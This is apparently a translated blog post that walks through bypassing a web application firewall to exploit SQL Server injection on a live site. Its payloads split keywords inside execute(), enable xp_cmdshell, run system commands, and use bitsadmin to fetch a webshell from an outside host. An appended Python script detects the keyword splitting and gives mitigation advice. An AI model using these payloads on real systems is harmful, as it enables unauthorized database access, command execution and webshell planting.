2025-02-24 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/01 Report--
0x00 Preface
The previous bypass was too simple: it could not extract data through the injection or obtain permissions. This time I continue the bypass and get the data.
0x01 Process
It is the same site as last time. A simple check confirms that an injection point exists.
The following are filtered: and followed by a number, exec, union select, and select followed by a number.
The execute function, however, is not filtered, and the WAF (the "dog") does not trigger, which shows that this function can be used.
execute('sql statement')  // execute takes the SQL statement as a string, so transformed strings can be passed in to bypass the WAF
Verify it locally.
Some transformations.
However, with SQL Server stacked-query injection the data is not displayed on the page, so this time the stacked statement is made to raise an error, which gives the effect of error-based injection.
execute('select convert(int,@@version)') --a
Of course, it needs to be transformed, or it will be intercepted because select appears in it.
execute('sel'%2b'ect convert(int,@@version)') --a  // %2b is the URL encoding of +, so this can be read as 'sel' + 'ect'
With the execute function, statements can be transformed so that the WAF does not intercept them, which makes it much easier to get data or execute SQL statements.
Executing xp_cmdshell: its output cannot be echoed through an error message, but the result can be redirected to a file or written to a table.
execute('master..xp_cmdshell whoami > e:\'%2b'\xx\'%2b'\1.txt')  // the double slash is filtered
It does not matter that an error is returned. The WAF does not intercept. Check whether 1.txt contains data.
0x02 Follow-up
I originally wanted to write a webshell or download one from the public network, but the server cannot reach the public network, and there is a WAF, which caused writing the shell to fail. After consideration, I want to kill the WAF, but still avoid affecting the server.
0x03 Other
Other commands used in this test:
execute('sp_configure "show advanced options", 1')
execute('reconfigure')
execute('sp_configure "xp_cmdshell", 1')
execute('reconfigure')
// the above four steps enable xp_cmdshell
execute('master..xp_cmdshell "bitsadmin /transfer n http://xxxxx/1.aspx c:\\path\\123.aspx"')
// download a webshell from the public network. In this article the download failed because the machine cannot reach the public network.
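A defender-side check for the keyword splitting described in 0x01, as an added example that is not part of the original article: it URL-decodes a logged query string, joins adjacent string literals the way SQL Server's + operator would, and flags dynamic execute() calls whose folded text contains sensitive keywords. The keyword list, the function names and the sample request lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Keywords and procedures named in this article (assumed list, extend as needed)
KEYWORDS = ("select", "union", "xp_cmdshell", "sp_configure", "reconfigure")
# exec( or execute( with optional whitespace before the parenthesis
EXEC_CALL = re.compile(r"\bexec(?:ute)?\s*\(", re.I)
# closing quote, '+', opening quote: the seam between two concatenated literals
CONCAT = re.compile(r"'\s*\+\s*'")

def fold_concat(sql: str) -> str:
    """Join adjacent string literals: 'sel'+'ect' becomes 'select'."""
    return CONCAT.sub("", sql)

def inspect(raw_query: str) -> dict:
    """Classify one raw (still URL-encoded) query string from a web log."""
    # unquote_plus mirrors the server: a raw '+' is a space, %2b is a real '+'
    decoded = unquote_plus(raw_query)
    folded = fold_concat(decoded)
    hits = [k for k in KEYWORDS if k in folded.lower()]
    # keywords that only appear after folding were deliberately split
    split = [k for k in hits if k not in decoded.lower()]
    dynamic = bool(EXEC_CALL.search(decoded))
    return {"dynamic_exec": dynamic, "keywords": hits,
            "split_keywords": split, "alert": dynamic and bool(hits)}

# Constructed sample query strings (not taken from a real log)
SAMPLES = [
    "id=1;execute('sel'%2b'ect convert(int,@@version)')--a",
    r"id=1;execute('master..xp_cmdshell whoami > e:\'%2b'\xx\'%2b'\1.txt')",
    "id=42&q=select+a+plan",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(inspect(line)["alert"], inspect(line)["split_keywords"], line)
```

A keyword-only signature never sees select in the first sample, so the check has to run on the folded text. On the database side, parameterized queries and a login without rights to xp_cmdshell or sp_configure remove the injection and its impact regardless of what the WAF matches.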